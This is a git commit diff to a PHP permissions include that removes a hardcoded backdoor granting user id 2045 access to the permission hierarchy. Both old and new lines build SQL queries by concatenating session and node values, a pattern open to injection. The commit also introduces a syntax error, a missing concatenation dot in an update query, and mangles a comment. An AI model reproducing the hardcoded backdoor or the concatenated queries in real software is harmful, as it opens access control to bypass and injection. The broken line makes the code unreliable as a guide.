small warning fix & removed is 2045 backdoor

diff --git a/wwwroot/inc/permissions.inc b/wwwroot/inc/permissions.inc
index 942a3f44038641fb744dcec887183643efb38741..ed921704e82585be25ab6c42c5131829799283b6 100644 (file)
--- a/wwwroot/inc/permissions.inc
+++ b/wwwroot/inc/permissions.inc
@@ -11,7 +11,7 @@ function isHierarch($node) {
        $hierarchy=explode(';',$node_vector);
        foreach ($hierarchy as $hierarch) {
                $hierarch=ltrim($hierarch,0);
-               $q="select nodes.node_creator,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$_SESSION['user_id']."' where nodes.node_id='$hierarch'";
+               $q="select nodes.node_creator,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$user_id."' where nodes.node_id='$hierarch'";
                $result=$db->query($q);
                $result->next();
                if ($result->getString('node_creator')==$user_id)
@@ -20,8 +20,8 @@ function isHierarch($node) {
                        return true;
                if ($result->getString('node_creator')=='operator')
                        return true;
-               if ($user_id == 2045)
-                       return true;
+//             if ($user_id == 2045)  // OMG
+//                     return true;
        }
        return false;
 
@@ -32,7 +32,7 @@ global $db;
 $user_id=$_SESSION['user_id'];
 
 /*
-thousand lights to Hierarchy!
+thousand lights   // OMGto Hierarchy!
 (check&set procedure for giving permissions for non-public subnodes according
 to bottom-top Hierarchy
 */
@@ -41,7 +41,7 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
        $hierarchy=array_reverse(explode(';',$node_vector));
        foreach ($hierarchy as $hierarch) {
                $hierarch=ltrim($hierarch,0);
-               $q="select nodes.node_creator,nodes.node_system_access,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$_SESSION['user_id']."' where nodes.node_id='$hierarch'";
+               $q="select nodes.node_creator,nodes.node_system_access,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$user_id."' where nodes.node_id='$hierarch'";
                $result=$db->query($q);
                $result->next();
                $hierarchy_bounce[]=$hierarch;
@@ -55,7 +55,7 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
                elseif ($result->getString('node_permission')!='') {
                        array_pop($hierarchy_bounce);
                        $node['node_permission']=$result->getString('node_permission');
-                               $q="update node_access set node_permission='".$result->getString('node_permission')."' where node_id='".$node['node_id']."' and user_id='".$_SESSION['user_id']."'";
+                               $q="update node_access set node_permission='".$result->getString('node_permission')."' where node_id='".$node['node_id']."' and user_id='".$user_id"'";
                                $updated=$db->update($q);
                                if (!$updated && IsSet($_SESSION['user_id'])) {
                                        $q="insert into node_access set node_permission='".$result->getString('node_permission')."', node_id='".$node['node_id']."',user_id='".$_SESSION['user_id']."'";